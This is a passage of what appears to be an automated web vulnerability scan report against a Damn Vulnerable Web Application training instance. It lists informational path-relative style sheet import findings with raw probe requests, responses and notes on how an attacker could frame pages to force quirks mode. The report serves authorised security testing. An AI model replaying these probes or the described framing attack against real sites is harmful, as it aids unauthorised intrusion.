Cookie: security=low; PHPSESSID=1c076da70ba08908592084877ba79f0b
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:57:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1441
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Login :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />
</head>
...[SNIP]...
Request 2
GET /login.php/ozdfbd/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=1c076da70ba08908592084877ba79f0b
Upgrade-Insecure-Requests: 1
Referer: http://82595c62-4945-4ed6-8df4-b75317e711ed.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:58:49 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1441
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Login :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />
</head>
...[SNIP]...
Request 3
GET /login.php/ozdfbd/dvwa/css/login.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=1c076da70ba08908592084877ba79f0b
Upgrade-Insecure-Requests: 1
Referer: http://c477ea7c-23ca-4b7e-bf06-ed53fa577b8c.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:58:49 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1441
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Login :: Damn Vulnerable Web Application (DVWA)</title>
<l
...[SNIP]...
19.5. https://pentest-ground.com:4280/security.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=15acf109d7974158e44f575c6f50730f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4486
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>DVWA Security :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 2
GET /security.php/ky8tda/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=15acf109d7974158e44f575c6f50730f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:00 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4486
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>DVWA Security :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 3
GET /security.php/ky8tda/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=15acf109d7974158e44f575c6f50730f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:00 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4486
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>DVWA Security :: Damn Vulnerable Web Application (DVWA)</title>
<link
...[SNIP]...
19.6. https://pentest-ground.com:4280/setup.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/setup.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /setup.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e5df376d6b202a2ec6ebbb2bdcb9cd2e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:16 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5152
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Setup :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 2
GET /setup.php/n22vod/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e5df376d6b202a2ec6ebbb2bdcb9cd2e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5152
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Setup :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="favicon.ico" />
...[SNIP]...
Request 3
GET /setup.php/n22vod/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=e5df376d6b202a2ec6ebbb2bdcb9cd2e
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:35 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5152
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Setup :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
19.7. https://pentest-ground.com:4280/vulnerabilities/brute/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/brute/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/brute/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=72abe663667a4505362110ff551e5951
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:08 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4153
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/brute/index.php/le1i3x/lhpjcl/w2vs8v/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=72abe663667a4505362110ff551e5951
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:57:29 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4153
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/brute/index.php/le1i3x/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=72abe663667a4505362110ff551e5951
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:57:29 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4153
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Brute Force :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
19.8. https://pentest-ground.com:4280/vulnerabilities/captcha/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/captcha/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/captcha/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=fafc6e93252383617a2b63515a784879
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4701
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/captcha/index.php/l8j0qc/aanag2/f4c0o5/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=fafc6e93252383617a2b63515a784879
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4701
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/captcha/index.php/l8j0qc/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=fafc6e93252383617a2b63515a784879
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4701
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Insecure CAPTCHA :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
19.9. https://pentest-ground.com:4280/vulnerabilities/csp/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=258eb52ea54dcc77d6cc80dfdfca473c
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:59 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
POST /vulnerabilities/csp/index.php/id5hrb/dbbon2/r42o0q/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=258eb52ea54dcc77d6cc80dfdfca473c
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:12 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
